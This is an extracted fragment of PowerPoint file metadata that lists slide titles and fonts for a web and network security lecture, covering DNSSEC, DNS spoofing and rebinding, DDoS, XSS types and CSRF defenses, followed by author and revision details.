      <vt:lpstr>Perpetua</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>Equity</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>This Lecture</vt:lpstr>
      <vt:lpstr>DNSSEC</vt:lpstr>
      <vt:lpstr>DNSSEC (DNS Security Extensions):</vt:lpstr>
      <vt:lpstr>Goal and Threat Model</vt:lpstr>
      <vt:lpstr>DNS Spoofing (1)</vt:lpstr>
      <vt:lpstr>DNS Spoofing (2)</vt:lpstr>
      <vt:lpstr>DNS Spoofing (3)</vt:lpstr>
      <vt:lpstr>DNS Spoofing (4)</vt:lpstr>
      <vt:lpstr>DNS Spoofing (5)</vt:lpstr>
      <vt:lpstr>DNS Spoofing (6)</vt:lpstr>
      <vt:lpstr>DNSSEC (DNS Security Extensions)</vt:lpstr>
      <vt:lpstr>DNSSEC (2) – New Records</vt:lpstr>
      <vt:lpstr>DNSSEC (3) – Validating Replies</vt:lpstr>
      <vt:lpstr>DNSSEC (4) – Validating Replies</vt:lpstr>
      <vt:lpstr>DNSSEC (4) – Validating Replies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DNSSEC (5)</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>DNS Rebinding Attack</vt:lpstr>
      <vt:lpstr>DNS Rebinding Defenses</vt:lpstr>
      <vt:lpstr>DDoS</vt:lpstr>
      <vt:lpstr>Topic</vt:lpstr>
      <vt:lpstr>Topic</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>Motivation (2)</vt:lpstr>
      <vt:lpstr>Goal and Threat Model</vt:lpstr>
      <vt:lpstr>Internet Reality</vt:lpstr>
      <vt:lpstr>Denial-of-Service</vt:lpstr>
      <vt:lpstr>Host Denial-of-Service</vt:lpstr>
      <vt:lpstr>Network Denial-of-Service</vt:lpstr>
      <vt:lpstr>Distributed Denial-of-Service (DDoS)</vt:lpstr>
      <vt:lpstr>Complication: Spoofing</vt:lpstr>
      <vt:lpstr>Spoofing (2)</vt:lpstr>
      <vt:lpstr>Best Practice: Ingress Filtering</vt:lpstr>
      <vt:lpstr>Flooding Defenses</vt:lpstr>
      <vt:lpstr>Cross-site Scripting</vt:lpstr>
      <vt:lpstr>What is Cross-site Scripting (XSS)?</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Type 2 Type 1</vt:lpstr>
      <vt:lpstr>Type 2 Type 1</vt:lpstr>
      <vt:lpstr>Type 2 Type 1</vt:lpstr>
      <vt:lpstr>Type 2 Type 1</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2 XSS Injection</vt:lpstr>
      <vt:lpstr>Script Injection</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Type 1: Reflected XSS</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Type 0: Dom Based XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Steps in a DOM-Based XSS Attack  Example-1</vt:lpstr>
      <vt:lpstr>Steps in a DOM-Based XSS Attack  Example-2</vt:lpstr>
      <vt:lpstr>Type 0: Dom Based XSS</vt:lpstr>
      <vt:lpstr>Type 0: Dom Based XSS</vt:lpstr>
      <vt:lpstr>Type 0: Dom Based XSS</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Type 2</vt:lpstr>
      <vt:lpstr>Exploiting a DOM Based XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Contexts in HTML</vt:lpstr>
      <vt:lpstr>Contexts in HTML</vt:lpstr>
      <vt:lpstr>Contexts in HTML</vt:lpstr>
      <vt:lpstr>HTML Contexts</vt:lpstr>
      <vt:lpstr>HTML Contexts</vt:lpstr>
      <vt:lpstr>HTML Contexts</vt:lpstr>
      <vt:lpstr>Injection Defenses</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Parameter Tampering</vt:lpstr>
      <vt:lpstr>Parameter Tampering</vt:lpstr>
      <vt:lpstr>Input Escaping or Sanitization</vt:lpstr>
      <vt:lpstr>Context Sensitive Sanitization</vt:lpstr>
      <vt:lpstr>Cross-site Request Forgery</vt:lpstr>
      <vt:lpstr>Example Application</vt:lpstr>
      <vt:lpstr>Running Example</vt:lpstr>
      <vt:lpstr>Running Example</vt:lpstr>
      <vt:lpstr>Running Example</vt:lpstr>
      <vt:lpstr>Running Example</vt:lpstr>
      <vt:lpstr>Running Example</vt:lpstr>
      <vt:lpstr>Running Example</vt:lpstr>
      <vt:lpstr>Running Example</vt:lpstr>
      <vt:lpstr>Running Example</vt:lpstr>
      <vt:lpstr>Network Requests</vt:lpstr>
      <vt:lpstr>CSRF Attack</vt:lpstr>
      <vt:lpstr>CSRF Attack</vt:lpstr>
      <vt:lpstr>CSRF Attack</vt:lpstr>
      <vt:lpstr>Example Attack</vt:lpstr>
      <vt:lpstr>CSRF Defense</vt:lpstr>
      <vt:lpstr>CSRF via POST requests</vt:lpstr>
      <vt:lpstr>CSRF via POST requests</vt:lpstr>
      <vt:lpstr>Origin Header</vt:lpstr>
      <vt:lpstr>Origin Header</vt:lpstr>
      <vt:lpstr>Nonce based protection</vt:lpstr>
      <vt:lpstr>Nonce based protection</vt:lpstr>
      <vt:lpstr>Legitimate Case</vt:lpstr>
      <vt:lpstr>Legitimate Case</vt:lpstr>
      <vt:lpstr>Legitimate Case</vt:lpstr>
      <vt:lpstr>Legitimate Case</vt:lpstr>
      <vt:lpstr>Attack Case</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Aslam</dc:creator>
  <cp:lastModifiedBy>Aqsa Aslam</cp:lastModifiedBy>
  <cp:revision>51</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-21T05:27:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-28T06:08:34Z</dcterms:modified>
</cp:coreProperties>
</file>